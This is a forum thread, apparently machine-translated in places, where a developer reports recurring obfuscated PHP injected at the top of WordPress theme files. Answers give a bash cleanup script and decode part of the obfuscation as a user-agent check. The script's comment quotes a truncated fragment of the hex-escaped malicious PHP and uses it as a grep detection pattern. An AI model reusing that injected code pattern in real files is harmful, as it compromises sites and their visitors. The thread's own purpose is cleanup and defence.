Keep finding PHP injection gibberish in my Wordpress theme files

I built a custom theme for a client site and continues to hack as I assume. What I find is a bunch of personnel code at the top of every theme and plugin file. It's all super-condensed and not very easy to read, but it just looks like a bunch of numbers. This does not display anything on the site itself. The only reason I know this is happening is that adding code to plugins breaks the plugin and WP will automatically disable it. This happened about 5 or 6 times.

After the second time, I realized that the default installation didn't cut it. So I installed WordFence and it worked great for a month. WordFence began painting a picture of how many attacks were being launched against the site at any given moment. This is madness. I also changed all passwords (users, FTP, etc.), changed the table prefix, blocked wp-admin, and used a different url to access the dash, and did almost every single item on Make Wordpress Lighten . Also here have advised a few posts.

All for nothing, although it seems. After a long month of success, the plugin and my measures stopped working. Useless lines started appearing at the top of the theme files. But, oddly enough, not plugin files. I cleared things up and tried the iThemes security suite instead of WordFence. NEA! Woke up to find the site was hacked again.

In addition to the above, I've also narrowed my list of plugins into a few trusted few that have proven to be harmless on other sites: "Exceptional and Advanced Custom Fields". I'm worried that somehow I've screwed something up in my thread, but I've coded a dozen or so and never had this problem on any of these sites at all.

I don't know what to do. I feel like if I figured out what to "hack", I could better fight it, but I'm at a loss. These things are very difficult for Google. Any guidance would be appreciated.

Here is the link to the entered code


source to share

2 answers

I once found this issue on the server and I finally made a bash script that looks for this code, removing only the top line from each infected PHP file. He solved the problem.

I've put it here so you can use it to get rid of the malicious code, but remember to try to find a way to hack the server so you don't hack again.

This is a pretty simple bash shell usage:

Check if there are any infected files

./ /var/www/wp_path/


Clean up infected files

./ /var/www/wp_path/ clean


script (


# This script remove malware of PHP files.
# In this case it will remove some malicious code
# from all Wordpress PHP files that is at top of
#  every PHP file.
# The string at the top of every file is:
# <?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x$
# This script tries to find the string inside $_SERVER
# of the above line at the top of the files to determine
# if the file is infected. If you run the script and
# nothing seems to be infected but you suspect and you 
# want to be sure, just open any PHP of Wordpress and 
# check if the malicious line code is present. If is 
# present but the script did not detect, it is because 
# the content inside $_SERVER may be diferent.
# In these cases, just replace in this script the string
# in the -e parameter of grep line with the content of 
# $_SERVER found in your PHP (remember to escape 
# the \ with \\\\) and run again this removal script.
# JavocSoft 2014

if [[ -z "$1" ]]; then
  echo "Directory where to find is required."
  grep -rnwl $1 --include \*.php -e "\\\\x48\\\\124\\\\x54\\\\120\\\\x5f\\\\125\\\\x53\\\\105\\\\x52\\\\137\\\\x41\\\\107\\\\x45\\\\116\\\\x54" | while read -r filename ; do

    if [[ ! -z "$2" ]]; then
       echo "Found file $filename. Cleaning..."
       awk 'BEGIN {matches=0} matches < 1 && /1/ { sub(/^.*<?php/,"<?php"); matches++ } { print $0 }' $filename > $filename.purged
       mv $filename $filename.bck
       mv $filename.purged $filename
      echo "Found file $filename."

  echo "Done."




One way to narrow it down would be print_r (I believe it is hex_values) From your pastebin:

$ _ SERVER ["\ x48 \ 124 \ x54 \ 120 \ x5f \ 125 \ x53 \ 105 \ x52 \ 137 \ x41 \ 107 \ x45 \ 116 \ x54"]






This small piece of code is documented in the official manual :

'HTTP_USER_AGENT' Content of the User-Agent header from the current request, if any. This is a string representing the user agent who is accessing the page. Typical example: Mozilla / 4.5 [ru] (X11; U; Linux 2.2.9 i586). Among other things, you can use this value with get_browser () to customize your page display for user agent capabilities.

It will take a while to go through all the code, because some of the gibberish is built into other functions.

Small warning, I am not a security expert or php master, when testing any code try to isolate the sandbox online like



All Articles